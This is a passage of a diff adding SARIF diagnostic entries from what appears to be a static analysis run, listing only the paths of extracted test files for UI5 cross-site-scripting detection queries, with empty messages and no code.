"%SRCROOT%", + "index" : 312 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 313 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 314 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 316 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 317 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 318 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 320 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 321 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 322 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 324 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 325 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 326 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 328 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 329 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 330 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 332 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 333 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 334 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 335 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 336 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 337 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 338 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 339 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 340 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 341 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 342 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uriBaseId" : "%SRCROOT%", + "index" : 344 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 345 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 346 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 347 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 349 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 350 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 351 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 353 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 354 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 356 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 357 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 358 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 359 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 362 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 364 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 365 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 366 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 368 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 369 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 370 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 372 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 373 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 374 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + } + 